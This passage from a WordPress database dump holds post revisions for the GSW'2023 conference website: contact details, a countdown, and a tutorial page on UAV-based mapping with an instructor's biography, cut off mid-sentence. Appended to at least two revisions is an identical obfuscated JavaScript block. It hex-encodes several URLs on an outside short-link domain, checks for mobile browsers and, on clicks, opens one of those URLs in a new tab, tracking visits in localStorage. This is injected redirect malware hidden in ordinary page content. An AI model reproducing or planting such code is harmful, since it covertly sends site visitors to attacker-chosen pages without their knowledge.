1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 02:11:58','2023-02-04 02:11:58','',3066,'https://gsw2023.com/?p=3737',0,'revision','',0),
(3738,1,'2023-02-04 02:16:17','2023-02-04 02:16:17','<p>[vc_row][vc_column][dt_portfolio_masonry content_alignment=\"center\" image_border_radius=\"10px\" image_paddings=\"15px 0px 15px 0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"off\" show_link=\"n\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-02-04 02:16:17','2023-02-04 02:16:17','',3670,'https://gsw2023.com/?p=3738',0,'revision','',0),
(3739,1,'2023-02-04 02:33:58','2023-02-04 02:33:58','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Ayman F. Habib</h6>\n<h6>Thomas A. Page Professor in Civil Engineering</h6>\n<h6>Lyles School of Civil Engineering, Purdue University, USA</h6>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"71\"][vc_row_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Scope</h5>\n<p>&nbsp;</p>\n<h6 style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:heading {\"level\":1} --></p>\n<h5><span style=\"font-size: 18pt;\"><strong>Instractor BIO</strong></span></h5>\n<h5><span style=\"font-size: 18pt;\"><strong><!-- /wp:heading --> <!-- wp:paragraph --></strong></span></h5>\n<p><span style=\"font-size: 14pt;\">Dr. Habib is the Thomas A. Page professor of Civil Engineering at Purdue University and the Co-Director of the Civil Engineering Center for Applications of UAS for a 